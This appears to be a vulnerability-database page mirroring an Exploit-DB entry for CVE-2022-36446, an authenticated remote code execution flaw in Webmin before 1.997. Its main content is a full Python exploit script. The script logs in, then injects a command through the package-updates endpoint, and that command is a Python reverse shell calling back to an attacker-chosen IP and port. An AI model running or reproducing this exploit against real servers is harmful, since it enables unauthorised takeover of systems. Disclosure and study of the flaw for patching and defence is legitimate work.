Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)

🗓️ 01 Aug 2022 00:00:00Reported by Emir PolatType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 721 Views

Webmin 1.996 - Remote Code Execution (Authenticated

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Webmin 1.996 - Remote Code Execution (Authenticated) Exploit
1 Aug 202200:00
zdt
GithubExploit		Exploit for Improper Encoding or Escaping of Output in Webmin
11 Aug 202211:47
githubexploit
GithubExploit		Exploit for Improper Encoding or Escaping of Output in Webmin
9 Sep 202210:34
githubexploit
ATTACKERKB		CVE-2022-36446
25 Jul 202206:15
attackerkb
BDU FSTEC		The vulnerability of the software component apt-lib.pl in the Webmin hosting control panel allows a hacker to execute arbitrary code.
12 Aug 202200:00
bdu_fstec
Circl		CVE-2022-36446
25 Jul 202212:32
circl
CNNVD		Webmin 安全漏洞
25 Jul 202200:00
cnnvd
Check Point Advisories		Webmin Command Injection (CVE-2020-35606; CVE-2022-36446)
20 Jan 202100:00
checkpoint_advisories
CVE		CVE-2022-36446
25 Jul 202205:56
cve
Cvelist		CVE-2022-36446
25 Jul 202205:56
cvelist
Rows per page
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446

import argparse
import requests
from bs4 import BeautifulSoup

def login(args):
    global session
    global sysUser

    session = requests.Session()
    loginUrl = f"{args.target}:10000/session_login.cgi"
    infoUrl = f"{args.target}:10000/sysinfo.cgi"

    username = args.username
    password = args.password
    data = {'user': username, 'pass': password}

    login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
    sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})

    bs = BeautifulSoup(sysInfo.text, 'html.parser')
    sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]

    if sysUser:
        return True
    else:
        return False

def exploit(args):
    payload = f"""
    1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
    os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
    """

    updateUrl = f"{args.target}:10000/package-updates"
    exploitUrl = f"{args.target}:10000/package-updates/update.cgi"

    exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}

    if login(args):
        print("[+] Successfully Logged In !")
        print(f"[+] Session Cookie => sid={session.cookies['sid']}")
        print(f"[+] User Found  => {sysUser[0]}")

        res = session.get(updateUrl)
        bs = BeautifulSoup(res.text, 'html.parser')

        updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]

        if updateAccess[0] == "package-updates":
            print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
            print(f"[+] Exploit starting ... ")
            print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")

            session.headers.update({'Referer'  : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
            session.post(exploitUrl, data=exploitData)
        else:
            print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
    else:
        print("[-] Login Failed !")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
    parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
    parser.add_argument('-u', '--username', help='Username For Login', required=True)
    parser.add_argument('-p', '--password', help='Password For Login', required=True)
    parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
    parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
    parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
    args = parser.parse_args()
    exploit(args)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Aug 2022 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
EPSS0.96049
webminremote code executionauthenticatedexploitcve-2022-36446ubuntu 20.04.4pythonreverse shell
721